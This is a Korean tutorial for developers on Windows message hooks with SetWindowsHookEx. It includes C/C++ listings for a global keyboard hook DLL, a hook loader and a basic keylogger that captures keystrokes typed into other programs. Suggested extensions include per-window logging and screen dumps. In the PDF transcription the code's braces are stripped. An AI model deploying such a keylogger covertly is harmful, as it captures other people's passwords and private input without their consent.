Microsoft Word - hook1.doc

Transcription

1 개발자를위한윈도우후킹테크닉 키보드모니터링프로그램만들기 후킹이란다른프로세스의실행경로를가로채는것을말한다. 윈도우프로그래머들이밥먹듯이하는서브클래싱 ( 윈도우메시지핸들러를가로채서컨트롤의기능을확장하는방법 ) 도후킹의한종류라할수있다. 이번강좌는 Windows Hook 을하는함수들을소개하고, 그것들을이용해서키로거를만들어본다. 목차 목차...1 필자소개...1 연재가이드...2 연재순서...2 필자메모...2 Introduction...3 후킹과훅체인...3 메모리공간의분리...4 SetWindowsHookEx...5 UnhookWindowsHookEx...7 CallNextHookEx...8 후킹을해보자...9 키보드후킹 공유세그먼트 키로거 도전과제 참고자료 필자소개 신영진 pop@jiniya.net 부산대학교정보, 컴퓨터공학부 4 학년에재학중이다. 모자란학점을다채워서졸업하는것이꿈이되버린소박한괴짜프로그래머. 병역특례기간을포함해서최근까지다수의보안프로그램개발에참여했으며, 최근에는모짜르트에심취해있다.

2 연재가이드 운영체제 : 윈도우 2000/XP 개발도구 : 마이크로소프트비주얼스튜디오 2003 기초지식 : C/C++, Win32 프로그래밍응용분야 : 키로거, 키보드훅프로그램 연재순서 키보드모니터링프로그램만들기 마우스훅을통한화면캡쳐프로그램제작 메시지훅이용한 Spy++ 흉내내기 SendMessage 후킹하기 Spy++ 클론 imspy 제작하기 저널훅을사용한매크로제작 WH_SHELL 훅을사용해다른프로세스윈도우서브클래싱하기 WH_DEBUG 훅을이용한훅탐지방법 OutputDebugString 의동작원리 필자메모 프로그램을개발한다면가끔고객들에게황당한요구를받기도한다. 그중일부는진짜황당한경우도있고, 더러는개발자가특정기술을모르기때문에발생하기도한다. 아래와같은요구사항에당황한적이있다면지금후킹이라는테크닉을여러분의도구상자로넣어야할때이다. 다른프로세스에서발생하는마우스이벤트를가지고뭔가작업을해야할때. 소프트아이스와같이 Ctrl + D 를눌렀을때, 근사한자신의다이얼로그를띄우고싶을때. 다른프로세스의특정윈도우를서브클래싱해야할때. 다른프로세스로전달되는메시지를모니터링하고싶을때. 완성된다른프로그램에특수한기능을추가해야할때. 위에서열거한것은지극히기본적인메시지훅과관련된내용들이다. 하지만위와같은 고객의요구에당황한적이있고, 위와같은문제로게시판을두드린적이있다면이번 강좌가분명히여러분에게도움이될것이다. 2/20 페이지

3 Introduction 후킹은그종류가너무도많다. 후킹을하는대상에따라서메시지후킹, API 후킹, 네이티브 API 후킹, 인터럽트후킹등이있다. 또한디바이스드라이버의필터드라이버도후킹의일종이라고할수있다. 우리가이번강좌에서살펴볼영역은메시지후킹이다. 이는 SetWindowsHookEx 라는문서화된함수를사용해서다른윈도우를후킹하는기법이다. 우리는앞으로 SetWindowsHookEx 를통해서할수있는다양한형태의후킹을시도해볼것이다. 키보드입력을모니터링하는 WH_KEYBOARD 훅, 마우스이벤트를모니터링하는 WH_MOUSE 훅, PostMessage 로전달된내용의처리과정을모니터링하는 WH_GETMESSAGE 훅, SendMessage 의처리과정을모니터링하는 WH_CALLWNDPROC, WH_CALLWNDPROCRET 훅, 입력이벤트를저장하고재생하는 WH_JOURNALRECORD, WH_JOURNALPLAYBACK 훅, 각종윈도우관련이벤트를통지받을수있는 WH_CBT 훅, 훅프로시저의수행과정을모니터링하는 WH_DEBUG 훅에관해서차례로살펴볼것이다.. 이번강좌에서는키보드후킹을통해서키로거를제작하는방법을배우고, 다음강좌에서는마우스훅을통해서다른윈도우를캡쳐하는프로그램을제작해본다. 후킹과훅체인 Windows 는여러개의프로그램이동시에실행되는멀티태스킹운영체제다. 하지만사용자의입력은언제나한가지윈도우에게만반응한다. 보통사용자의키보드입력과마우스입력이동시에두개의윈도우로전달되는일은없다. Win32 환경에서나의프로세스에속하지않은윈도우에서벌어지는일들을알기란쉽지않다. 이렇게쉽지않은일을가능하게해주는것이후킹이다. 후킹이란무엇인가? 후킹이란무엇인가를가로채는것을말한다. 가장원시적인형태의후킹은특정메모리번지를수정해서다른프로그램의실행흐름을변경시키는것이다. 가장흔한예는점프코드의번지를변경하는것이다. jmp 100 이 100 번지로이동하는코드라고할때, 100 을 200 으로변경하면프로그램의실행경로가바뀐다. 같은원리로윈도우의메시지핸들러주소를변경해서기능들을추가하는서브클래싱도후킹이라할수있다. 서브클래싱에대해서좀더생각해보자. H 라는핸들을가진윈도우가있다. 이윈도우의 메시지핸들러주소는 100 번지이고, 이는메모리의 X 번지에기록되어있다. H 로전달되는 3/20 페이지

4 메시지가있다면운영체제는 X 번지를참조해서해당핸들러를호출한다. 이경우에 핸들러는 100 번지이기때문에 100 번지함수를호출할것이다. H 에추가적인기능을넣기위해서서브클래싱을한다. 새로운메시지핸들러의주소가 200 번지라고가정한다면, 프로그래머는 X 에 200 을쓸것이다. 이제부터운영체제는 100 번지대신 200 번지를호출한다. 200 번지메시지핸들러는원래의기능을유지하기위해서 100 번지메시지핸들러의주소를저장하고있어야한다. 더많은기능을추가하기위해서 H 를다시서브클래싱한다. 새로운메시지핸들러가 300 번지이고위와같은형태로 X 를덮어썼다면메시지핸들러는 300->200->100 의순으로호출된다. 이렇게 300->200->100 의순으로이어지는리스트를훅체인이라고한다. 한개의사슬로연결되어서연쇄적으로호출된다는의미다. 서브클래싱이가장원시적인이유는단순한주소수정만으로후킹이이루어지기때문이다. X 번지에 200 을쓰는순간이전값인 100 은사라진다. 관리는전적으로덮어쓴곳에서해야한다. 300->200->100 과같이훅체인이생성된경우빠져나오는것은쉽지않다. 왜냐하면중간에있는훅프로시저가체인에서빠지면그것을참조하는다른훅프로시저때문에잘못된메모리연산오류가발생한다. 이렇게단순하게구성된훅체인에서훅을제거할때에는항상두가지를체크해야한다. 과연내가지금빠질수있는상황인가? 위의경우에 300 번지는그냥빠질수있는프로시저다. 빠질수없는위치에있다면자신보다나중에훅을수행한프로시저를제거하고빠질것인가? 위에서 200 번지가빠지는상황이라면메시지프로시저를 100 번지로수정하고메모리에서내려간다는의미다. 두가지모두만족되지않는상황이라면해당훅프로시저는메모리에계속있는것이바람직하다. 물론자신의훅프로시저코드는수행하지않음으로써훅이제거된것과동일한결과를연출할수있다. 앞서설명한문제점때문에새롭게개발되는훅들은위와갈은단순한형태로이루어지지않는다. 대다수훅프레임워크는등록, 제거, 다음훅프로시저호출이라는세가지함수를노출시킨다. 이경우는훅체인을중앙에서직접관리하기때문에제거할때문제가생기지않는다. 메모리공간의분리 Win16 환경에서는모든프로세스가같은주소공간에있었다. 이러한시스템에서는한프로세스의오류가다른프로세스로전파되는일이비일비재했었다. 내가버퍼를넘어서 4/20 페이지

5 기록한내용이다음프로세스의주소공간일수도있기때문이다. 이러한문제점을 해결하기위해서 Win32 환경에서는모든프로세스의주소공간을분리시켰다. 이러한이야기를처음듣는사람들은주소공간이분리했다는것이무슨말인지의아해한다. 쉽게설명하면모든프로세스가독립적인 4GB 메모리공간을가진다는것이다. 현재실행중인두개의프로세스 A, B 가있을때, A 의 10 번지주소의내용과 B 의 10 번지주소의내용은동일하지않다는의미다. 즉, 실행프로세스개수 * 4GB 만큼의메모리가있는것같은환경을운영체제가제공해준다는의미다. 메모리공간의분리는운영체제의견고함에는힘을실어줬지만다른프로세스를후킹하는작업은몇곱절더힘들게만들었다. 그래서 Microsoft 에서는좀더편리하게후킹작업을할수있는방법을고안해냈다. SetWindowsHookEx 라는 API 를사용하면해당프로시저가다른프로세스의주소공간으로자동으로초대해주는것이다. SetWindowsHookEx 다른주소공간으로초대받기위한등록작업을하는함수가 SetWindowsHookEx 다. 이함수를사용하면시스템은우리가만든 DLL 을특정상황에다른프로세스의주소공간으로넣어준다. 함수원형은다음과같다. HHOOK SetWindowsHookEx(int idhook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwthreadid); idhook: [ 입력 ] 어떤종류의후킹을할것인지지정한다 (< 표 1> 참고 ). 훅의개략적인 설명을담고있다. 각훅에대한자세한특성은앞으로실습을하면서배울것이다. 표 1 idhook 값의의미값의미 SendMessage 프로시저가처리되기직전시점을모니터링 WH_CALLWNDPROC 한다. WH_CALLWNDPROCRET SendMessage 가처리되고리턴되는시점을모니터링한다. 윈도우생성 / 소멸 / 활성화등의 CBT 기반프로그램에도움이 WH_CBT 될만한정보를통지받을수있다. WH_DEBUG 다른훅프로시저를디버깅하는훅프로시저현재활성화된윈도우스레드가유휴상태가될때를 WH_FOREGROUNDIDLE 감지한다. 5/20 페이지

6 PostMessage 를통해서메시지가메시지큐에들어가는것을 WH_GETMESSAGE 모니터링한다. WH_JOURNALPLAYBACK WH_JOURNALRECORD 를통해서기록된내용을재생한다. WH_JOURNALRECORD 키보드 / 마우스등의입력을기록한다. WH_KEYBOARD 키보드입력내용을모니터링한다. NT/2000/XP: WH_KEYBOARD 보다저수준에서키보드입력 WH_KEYBOARD_LL 내용을모니터링한다. WH_MOUSE 마우스입력내용을모니터링한다. NT/2000/XP: WH_MOUSE 보다저수준에서마우스입력 WH_MOUSE_LL 내용을모니터링한다. 다이얼로그박스, 메뉴, 스크롤바등에서생성되는입력 WH_MSGFILTER 메시지를모니터링한다. WH_SHELL 쉘애플리케이션에유용한정보를통지받는다. 다이얼로그박스, 메뉴, 스크롤바등에서생성되는입력 WH_SYSMSGFILTER 메시지를모니터링한다. 호출한스레드와같은데스크톱상에존재하는모든윈도우의메시지를감시한다. lpfn: [ 입력 ] 후킹프로시저의주소를넣어준다. hmod: [ 입력 ] 후킹프로시저가존재하는모듈핸들을넣어준다. dwthreadid: [ 입력 ] 후킹할스레드의아이디를넣어준다. 이값으로 0 을지정하면시스템내의모든스레드를후킹한다. 리턴값 : 훅핸들. 성공한경우에는적절한훅핸들을넘겨준다. 실패한경우에는 NULL 을리턴한다. 한가지주의해야할점은다른프로세스를후킹하기위해서훅프로시저는반드시 DLL 내부에존재해야한다는것이다. 그래야운영체제가해당 DLL 을다른프로세스에서로드시켜서훅프로시저를호출할수있다. 그리고 DLL 내부에있는훅프로시저가호출되는스레드컨텍스트는훅의종류에따라틀리다. < 표 2> 에훅의종류에따른설치범위와실행컨텍스트가나와있다. 임의의스레드컨텍스트에서실행되는훅은데이터를교환하기위해서 IPC 관련함수들을사용해야한다. 표 2 훅의설치범위와실행컨텍스트 훅 설치범위 실행컨텍스트 WH_CALLWNDPROC 지역, 전역 임의의스레드컨텍스트 WH_CALLWNDPROCRET 지역, 전역 임의의스레드컨텍스트 6/20 페이지

7 WH_CBT 지역, 전역 임의의스레드컨텍스트 WH_DEBUG 지역, 전역 임의의스레드컨텍스트 WH_FOREGROUNDIDLE 지역, 전역 임의의스레드컨텍스트 WH_GETMESSAGE 지역, 전역 임의의스레드컨텍스트 WH_JOURNALPLAYBACK 전역 설치한스레드컨텍스트 WH_JOURNALRECORD 전역 설치한스레드컨텍스트 WH_KEYBOARD 지역, 전역 임의의스레드컨텍스트 WH_KEYBOARD_LL 전익 설치한스레드컨텍스트 WH_MOUSE 지역, 전역 임의의스레드컨텍스트 WH_MOUSE_LL 전역 설치한스레드컨텍스트 WH_MSGFILTER 지역, 전역 임의의스레드컨텍스트 WH_SHELL 지역, 전역 임의의스레드컨텍스트 WH_SYSMSGFILTER 전역 임의의스레드컨텍스트 UnhookWindowsHookEx 후킹을종료하고싶을때에는 UnhookWindowsHookEx 함수를호출하면된다. 이함수의경우사용방법이간단하다. 앞절에서소개한 SetWindowsHookEx 함수를통해리턴받은훅핸들을넣어주면모든일이끝난다. 아래는함수의원형이다. BOOL UnhookWindowsHookEx(HHOOK hhk); hhk: [ 입력 ] 앞에서소개한 SetWindowsHookEx 를통해서리턴받은훅핸들을넣어준다. 리턴값 : 함수가성공한경우에는 TRUE 를, 실패한경우에는 FALSE 를리턴한다. 이함수를사용할때에한가지주의할점은 UnhookWindowsHookEx 를호출하는순간에 다른프로세스로인젝트된 DLL 이모두빠지는것은아니라는점이다. 인젝트된 dll 이 분리되는시점은시스템이결정한다. 이러한문제때문에간혹후킹모듈을테스트하다보면인젝트된 dll 이빠지지않는현상이발생하곤한다. 보통의경우인젝트된프로세스를활성화시키거나종료시키면분리가되는데, 시스템프로세스의경우그것도여의치않은경우가종종있다. 따라서가급적후킹모듈의테스트는개발컴퓨터가아닌다른테스트컴퓨터에서하는것이바람직하다. 테스트컴퓨터가없거나테스트컴퓨터를사용하기가불편한경우라면 Virtual PC 나 vmware 를사용한가상 PC 를통해테스트하는것도좋은방법이다. 7/20 페이지

8 CallNextHookEx 지금과같이멀티태스킹이란개념이발달한운영체제에서는어떠한자원이든혼자서독점하게놓아두지않는다. 후킹도마찬가지다. 시스템에존재하는모든프로세스가자신과마찬가지로후킹할권리가있다. 또한이러한후킹시스템이잘운영될수있도록자신의후킹작업이완료된다음에는반드시다음후킹프로시저에게제어권을넘겨주어야한다. 물론이작업이절대적인것은아니다. 하지않아도된다는의미다. 하지만다른후킹프로시저로제어권을넘겨주지않을경우해당프로시저는호출되지않을것이다. 이럴경우제어권을받지못한프로그램의입장에서는호출되어야할시점에호출이되지않았기때문에오동작할수도있다는점을명심하자. CallNextHookEx 함수는다음훅프로시저에게제어권을넘기는작업을한다. 통상적으로 이함수는훅프로시저의말미에호출한다. LRESULT CallNextHookEx(HHOOK hhk, int ncode, WPARAM wparam, LPARAM lparam); hhk: 무시된다. 간혹예전자료들을참고해보면이핸들을 SetWindowsHookEx 에서리턴받은값으로설정해야하고, 그러기위해서훅핸들을공유메모리등에보관해야한다고나와있다. 이는잘못된정보다. NULL 로지정하도록하자. ncode, wparam, lparam: 이값들은모두후킹프로시저내부로전달된값을그대로넣어주면된다. 리턴값 : 다음후킹프로시저의리턴값이리턴된다. 보통의경우후킹프로시저는여기서리턴되는값을그대로리턴한다. 박스 1 디버그뷰디버그출력은가장원시적이면서효과적인디버깅도구다. 디버그뷰는 OutputDebugString 으로출력하는내용을가로채서보여주는기능을한다. 무료프로그램이며아래주소에서다운로드하면된다. 아직사용해보지않았다면반드시다운받아서사용해보도록하자. 아마도여러분의가장충실한디버깅도구가될것이다. 후킹프로시저를디버깅할때주의해야하는것은디버그뷰가행이걸리는경우가있다는 점이다. 키로거를예로들어보면키보드훅프로시저가디버그출력을가지고있고, 디버그 8/20 페이지

9 뷰위에서키보드를마구누르는경우에종종행이걸린다. 상용후킹프로그램들을리버싱 해보면스레드컨텍스트가디버그뷰인경우에는훅을건너뛰도록작성한제품들을종종 볼수있다. 후킹을해보자 이제우리는윈도우후킹에필요한세가지도구를 -- SetWindowsHookEx, UnhookWindowsHookEx, CallNextHookEx -- 모두갖췄다. 이제이도구를사용해서실제로어떻게후킹을하는지살펴보도록하자. < 리스트 1> 은후킹에일반적으로사용되는코드다. 리스트 1 간단한훅 DLL keyhk.cpp #include <windows.h> #include <strsafe.h> HHOOK g_hhook = NULL; HINSTANCE g_hinst = NULL; BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID /* reserved */) g_hinst = hinst; // 쓰레드통지는받지않는다. if(reason == DLL_PROCESS_ATTACH) DisableThreadLibraryCalls(hInst); return TRUE; // 키보드후킹프로시저 LRESULT CALLBACK KeyHook(int code, WPARAM w, LPARAM l) if(code >= 0) TCHAR buf[80]; StringCbPrintf(buf, sizeof(buf), TEXT("%c"), w); OutputDebugString(buf); return CallNextHookEx(NULL, code, w, l); // 훅프로시저설치 BOOL WINAPI 9/20 페이지

10 InstallHook() BOOL ret = FALSE; if(!g_hhook) g_hhook = SetWindowsHookEx(WH_KEYBOARD, KeyHook, g_hinst, 0); if(g_hhook) ret = TRUE; return ret; // 훅프로시저제거 BOOL WINAPI UninstallHook() BOOL ret = FALSE; if(g_hhook) ret = UnhookWindowsHookEx(g_hHook); if(ret) g_hhook = NULL; return ret; InstallHook 과 UninstallHook 은위에서소개한함수들을사용해서훅의설치와제거를담당하는함수다. DllMain 함수의 DisableThreadLibraryCalls 함수는불필요한 DLL_THREAD_ATTACH, DLL_THREAD_DETACH 통지를받지않도록하는기능을한다. KeyHook 은키보드메시지가발생할때호출되는후킹함수다. 전형적인후킹함수의구조이므로익혀두도록하자. code 가 0 이상인경우만처리해야한다. 후킹 DLL 을만들때마다그것을테스트하는프로그램을만드는것은굉장히성가신일이다. 이러한작업을좀더편하게해주는프로그램이 < 리스트 2> 에나타나있다. 이프로그램은두번째인자로넘어온 DLL 을로드한후 InstallHook 과 UninstallHook 을찾아서호출해주는역할을한다. 리스트 2 범용훅로더프로그램 #include <windows.h> #include <conio.h> 10/20 페이지

11 typedef BOOL (WINAPI *FInstallHook)(); typedef BOOL (WINAPI *FUninstallHook)(); int _tmain(int argc, _TCHAR* argv[]) HINSTANCE inst = NULL; if(argc < 2) goto $cleanup; // DLL 을로드한다. inst = LoadLibrary(argv[1]); if(inst == NULL) goto $cleanup; // DLL 에서후킹함수를찾는다. FInstallHook fninstallhook = (FInstallHook) GetProcAddress(inst, TEXT("InstallHook")); FUninstallHook fnuninstallhook = (FUninstallHook) GetProcAddress(inst, TEXT("UninstallHook")); if(fninstallhook == NULL fnuninstallhook == NULL) goto $cleanup; // 후킹을한다. if(fninstallhook()) printf("press any key to uninstall hook\n"); _getch(); // 사용자의입력이들어온경우후킹을종료한다. fnuninstallhook(); $cleanup: // 라이브러리를해제한다. if(inst) FreeLibrary(inst); return 0; 11/20 페이지

12 화면 1 컴파일후실행하는화면 실제위의프로그램을컴파일해서실행한후디버그뷰를통해서키보드가캡쳐되는지확인해보도록하자. 콘솔창이떠있는상태에서다른윈도우로옮겨간후키보드를입력해보자. 입력하는내용이디버그뷰에나타날것이다. 아래화면과같이다른윈도우에입력하는키보드내용이디버그뷰에나타난다면후킹에성공한것이다. 화면 2 디버그뷰를통해키보드후킹내용을확인하는화면 박스 2 cygwin Windows 의콘솔창은많은발전을이루었음에도아직도조악하기그지없다. 물론몇몇레지스트리를손봐주면못쓸정도로불편하진않지만그래도편리한정도는아니다. 유닉스계열의운영체제를사용해본사람이라면누구나그막강한툴과쉘의능력이그리울수밖에없다. 하지만이것도이제는더이상꿈이아니다. cygwin 을설치하면여러분의 12/20 페이지

13 콘솔창을 bash 로업그레이드할수있다. cygwin 은윈도우환경에서리눅스가동작하도록 각종프로그램을포팅한것이다. 아직여러분의시스템에 cygwin 이설치되지않았다면꼭 설치해보도록하자. cygwin 은 에서구할수있다. cygwin 을처음설치하고실행을하면 Windows 기본콘솔창이뜬다. 다음과같이수정하면 rxvt 를기본터미널로사용할수있다. cygwin 이설치된폴더에있는 cygwin.bat 파일의마지막줄을다음과같이변경한다. 참고로 rxvt 를사용하기위해서는 cygwin 을설치할때 rxvt 를같이설치해야한다. c:\cygwin\bin\rxvt.exe -bg black -sl sr -fg white -fn 돋움체 -mcc -ls -g 90x30 -e /usr/bin/bash --login -i 한글을원할하게사용하기위해서는홈디렉터리에있는 ".inputrc" 파일을수정해야한다. ".inputrc" 파일의마지막부분에아래내용을추가하도록하자. set meta-flag On set convert-meta Off set output-meta On ls 에서한글파일명이깨져서출력되는문제를해결하기위해서는홈디렉터리의 ".bashrc" 파일에있는 alias 내용을아래와같이수정하면된다. alias ls='ls -F --color=auto --show-control-char' 끝으로특정폴더에서 rxvt 를바로실행시키기위해서는아래내용의 reg 파일을만들어서 추가하면된다. 추가한다음폴더에서오른쪽버튼을누르면 "RXVT 실행 " 메뉴가 추가되었음을볼수있을것이다. 그메뉴를선택하면해당폴더에서 rxvt 가실행된다. Windows Registry Editor Version 5.00 실행 " -bg black -sl sr -fg white -fn 돋움체 -mcc -ls -g 90x30 -e /usr/bin/bash --login -i -c 'cd \"`cygpath \"$*\"`\";exec /bin/bash -rcfile ~/.bashrc' bash %L" 13/20 페이지

14 키보드후킹 SetWindowsHookEx 로우리는여러가지종류의후킹을할수있었다. 각각의후킹함수들의파라미터와리턴값은조금씩다른의미를가진다. 따라서후킹을성공적으로하기위해서는각각의후킹함수에대해서정확하게이해할필요가있다. 이번강좌에소개한 WH_KEYBOARD 후킹함수에대해서좀더자세히살펴보도록하자. LRESULT CALLBACK KeyboardProc(int code, WPARAM wparam, LPARAM lparam); code: [ 입력 ] code 값이 0 보다작은경우는훅프로시저를수행하지않고바로 CallNextHookEx 를호출한다음리턴해야한다 (< 표 3> 참고 ). 표 3 code 값의미코드값의미 HC_ACTION wparam 과 lparam 이키보드정보를담고있다. wparam 과 lparam 이키보드정보를담고있다. 이값은메시지큐에서메시지가제거되지않을때 HC_NOREMOVE 설정된다 (PeekMessage 의 PM_NOREMOVE 플래그가설정된경우다 ). wparam: [ 입력 ] 현재키보드입력이벤트를일으킨가상키코드. lparam: [ 입력 ] 키보드입력에대한부가정보. 이정보는비트별로 < 표 4> 에나타난것과 같은의미를가진다. 표 4 lparam 비트별의미비트의미 0-15 반복횟수 스캔코드. 현재눌려진키가확장키인지를의미한다. 24 확장키인경우 1 을, 그렇지않은경우 0 을가진다 예약됨. ALT 키가눌려진상태인경우 1 을, 그렇지않은경우 0 을 29 가진다. 이전키상태. 키가눌려진경우 1 을, 그렇지않은경우 30 0 을가진다. 31 키가눌려진경우 0 을, 그렇지않은경우 1 을가진다. 14/20 페이지

15 리턴값 : code 가 0 보다작은경우는훅프로시저를수행하지않고 CallNextHookEx 를호출한후결과값을리턴해야한다. 그렇지않은경우에도 CallNextHookEx 의호출결과를리턴하는것이좋다. 만약키보드메시지처리를중단하고싶다면 CallNextHookEx 를호출하지않고 0 이아닌값을리턴하면된다. lparam 의경우복잡한비트구조를가지고있다. 이럴경우하나씩비트를계산해서 마스킹하는것보다는비트필드를만들어서참조하는것이간편하다. 위의비트구조를 비트필드로만들어보면아래와같다. typedef struct _KEYINFO unsigned repeatcnt:16; unsigned scancode:8; unsigned extended:1; unsigned reserved:4; unsigned alt:1; unsigned prevpressed:1; unsigned notpressed:1; KEYINFO, *PKEYINFO; // 반복횟수 // 스캔코드 // 확장키 // 예약됨 // Alt // 이전키상태 // 현재키상태 위의정보가정확히어떤때에어떻게사용되는지자세하게알수있는가장좋은방법은 직접파라미터를출력해서확인해보는방법이다. 앞절에서소개한 KeyHook 함수를 아래와같이고쳐서실행해보도록하자. LRESULT CALLBACK KeyHookEx(int code, WPARAM w, LPARAM l) if(code >= 0) TCHAR buf[80]; StringCbPrintf(buf, sizeof(buf), TEXT("W=%08X(%c) L=%08X"), w, w, l); OutputDebugString(buf); return CallNextHookEx(NULL, code, w, l); 키보드훅의경우키보드메시지처리를중단할수있는기능이있다. 중단을시키게되면훅체인의뒤에존재하는훅프로시저와키보드메시지가발생한윈도우는키보드메시지를받지못한다. 위의코드를아래와변형시켜서테스트해보자. 아마 w 키를누른경우는화면에키값이나타나지않을것이다. 15/20 페이지

16 if(code >= 0) TCHAR buf[80]; StringCbPrintf(buf, sizeof(buf), TEXT("W=%08X(%c) L=%08X"), w, w, l); OutputDebugString(buf); if(w == 'W') return TRUE; 후킹프로시저의경우되도록간단하게작성하는것이좋다. 왜냐하면후킹프로시저의경우일반적으로호출되는빈도가높고, 불필요한호출이기때문이다. 결국불필요한부하만시스템에추가하는셈이되기때문이다. 멀티스레딩을사용할때에도멀티스레딩의컨텍스트전환부하보다그것을분산해서처리했을때효과가클때에만사용하는것이좋듯이, 후킹도그것을해서발생하는부하가그것을감수할정도로멋진기능일때에만사용하는것이바람직하다. 하지만어떠한경우건사용자가이러한불필요한부하를느낄정도로후킹프로시저가복잡하다면이는문제가된다. 이정도로느린소프트웨어를사용자는사용하지않을것이기때문이다. 더욱이전역후킹이라면, 시스템전체가느려지기때문에문제가더욱심각하다고할수있다. 이경우엔해당후킹프로시저를단순화할방법을생각하거나아니면후킹의범위를제한할필요가있다. 후킹프로시저의궁극의경지는있는듯없는듯후킹하는것이라는점을명심하자. 공유세그먼트 다른주소공간으로가버린 DLL 과우리는더이상연결할방도가없다. 해당 DLL 이실행되는컨텍스트또한다른프로세스의스레드컨텍스트이기때문이다. 하지만이러한연결방법이없다면후킹 DLL 이의미있는동작을하기란힘들다. 따라서우리는실행모듈과후킹 DLL 사이의정보공유방법을생각해야한다. 여러가지방법이있지만, 가장빠르고쉬운방법은공유세그먼트를사용하는것이다. 이는 DLL 의일부값들을공유세그먼트에저장하는방법을말한다. 공유세그먼트에저장된내용은프로세스의경계를넘어서공유되기때문에그값을변경하면 DLL 이어떤프로세스의주소공간에있건동일한값을볼수있다. #pragma data_seg("shared") HWND g_targetwnd = NULL; 16/20 페이지

17 #pragma data_seg() #pragma comment(linker, "/SECTION:Shared,RWS") 위의코드는공유세그먼트를설정하는방법을보여준다. 첫번째줄은 Shared 라는세그먼트를시작한다는것을알려준다. 이후에선언되는것들은해당세그먼트에저장된다. 세번째줄은원래세그먼트로돌아가라는의미다. 따라서이후에선언되는내용은더이상 Shared 세그먼트에저장되지않는다. 결국위의세줄은 g_targetwnd 를 Shared 세그먼트에저장하는것을지시한다. 네번째줄은 Shared 세그먼트에읽기, 쓰기, 공유속성을지정하는것을의미한다. 위에서지시할수있는값으로읽기 (R), 쓰기 (W), 실행 (E), 공유 (S) 가있다. 여기서한가지주의해야할점은위와같이특정세그먼트에저장하기위해서는반드시초기화를해주어야한다는점이다. 초기화과정이빠질경우컴파일러는해당변수를지정된세그먼트에위치시키지않는다. 위와같이한후컴파일을하면 g_targetwnd 의값은모든프로세스사이에서공유한다. 굉장히간단한방법이다. 하지만이방법의경우장점만있는것은아니다. 다음과같은 단점이있다. 초기화된데이터만들어가므로섹션내의데이터가증가할수록덩달아 DLL 의크기도커진다. 공유데이터섹션이존재하는 DLL 의경우실행압축을적용하기가힘들다. 공유섹션에데이터가존재하기때문에보안상문제가발생할수있다. 변수를공유하기때문에결국프로세스경계에서한곳의문제가다른곳으로전파될수있다. 위와같이많은단점이있지만실행압축이필요없고중요하지않은간단한데이터를 조심스럽게다루는곳이라면충분히사용할가치가있다. 왜냐하면쓰기편하고간단하기 때문이다. 키로거 지금까지설명한내용만으로도충분히좋은키로거를제작할수있을것이다. 필자가제작한것은아주기본적인키로거기능만가진것이다. < 화면 3> 에그실행화면이나타나있다. 17/20 페이지

18 화면 3 초간단키로거실행화면 항상위버튼이. 체크된상태에서는다른윈도우에가려지지않는다. 지우기버튼은 에디터의내용을지워준다. 훅설치버튼을누르면후킹이시작되고, 훅제거버튼을누르면 설치된훅을제거해준다. < 리스트 3> 에키로거에서사용된키보드훅프로시저가나와있다. 키코드를아스키코드로변환하는과정과키로거윈도우로메시지를통해전송하는부분이핵심적인부분이다. 단순히 SendMessage 로메시지를전송할경우키로거윈도우가블록되면 DLL 도같이블록되는문제점이있다. 이러한문제를피하기위해서 SendMessageTimeout 을사용했다. 리스트 3 키보드훅프로시저 LRESULT CALLBACK KeyHookMsg(int code, WPARAM w, LPARAM l) // code 가 0 이상인경우와후킹정보를전송할윈도우가존재하는경우에만후킹프로시저를수행한다. if(code >= 0 && IsWindow(g_targetWnd)) PKEYINFO keyinfo = (PKEYINFO) &l; // 확장키가아니고, alt 가눌려지지않은상태에서, 키를누른경우를검사한다. if(!keyinfo->extended &&!keyinfo->alt &&!keyinfo->notpressed) BYTE keystate[256]; WORD ch=0; 18/20 페이지

19 // 가상키코드를적절한형태의아스키코드로변환한다. Control 키는무시한다. GetKeyboardState(keyState); keystate[vk_control] = 0; if(toascii((uint) w, keyinfo->scancode, keystate, &ch, 0) == 1) // 대상윈도우로키메시지를전송한다. // WPARAM 으로는아스키코드롤, lparam 으로는넘어온키정보값을전송한다. SendMessageTimeout( g_targetwnd, g_callbackmsg, ch, l, SMTO_BLOCK SMTO_ABORTIFHUNG, 50, NULL ); return CallNextHookEx(NULL, code, w, l); 훅프로시저에서 SendMessageTimeout 으로전달한메시지를실제프로그램에서처리하는 부분이 < 리스트 4> 에나와있다. 각종제어문자를확장시킨후버퍼에저장한다. 최종적으로버퍼의내용을에디터끝에추가하면모든작업이마무리된다. 리스트 4 훅메시지핸들러 LRESULT CkeylogDlg::OnKeyMsg(WPARAM w, LPARAM l) CString buf; PKEYINFO keyinfo = (PKEYINFO) &l; // 에디터에추가할내용을 buf 에저장한다. for(unsigned i=0; i<keyinfo->repeatcnt; ++i) switch(w) case VK_BACK: buf += "<BS>"; break; case VK_SPACE: buf += "<SP>"; break; case VK_TAB: buf += "<TAB>"; break; default: 19/20 페이지

20 buf += (TCHAR) w; break; // 에디터의마지막부분에 buf 를추가한다. int len = m_edtkeylog.getwindowtextlength(); m_edtkeylog.setsel(len, len); m_edtkeylog.replacesel(buf); return 0; 도전과제 우리가구현한키로거는가장원시적인형태다. 한단계내공을업그레이드하고싶다면이곳에다음과같은기능을추가하고구현해보자. 프로세스별키로깅내용저장 키메시지가발생한윈도우화면덤프 키메시지가발생한시간출력 특정윈도우만키로깅 WH_KEYBOARD_LL 을사용한키로거제작 저장된키로깅내용재생 참고자료 참고자료 1. " 해킹 / 파괴의광학 " - 김성우저참고자료 2. "Programming Applications for Windows (4/E)" Jeffrey Ritcher 저 20/20 페이지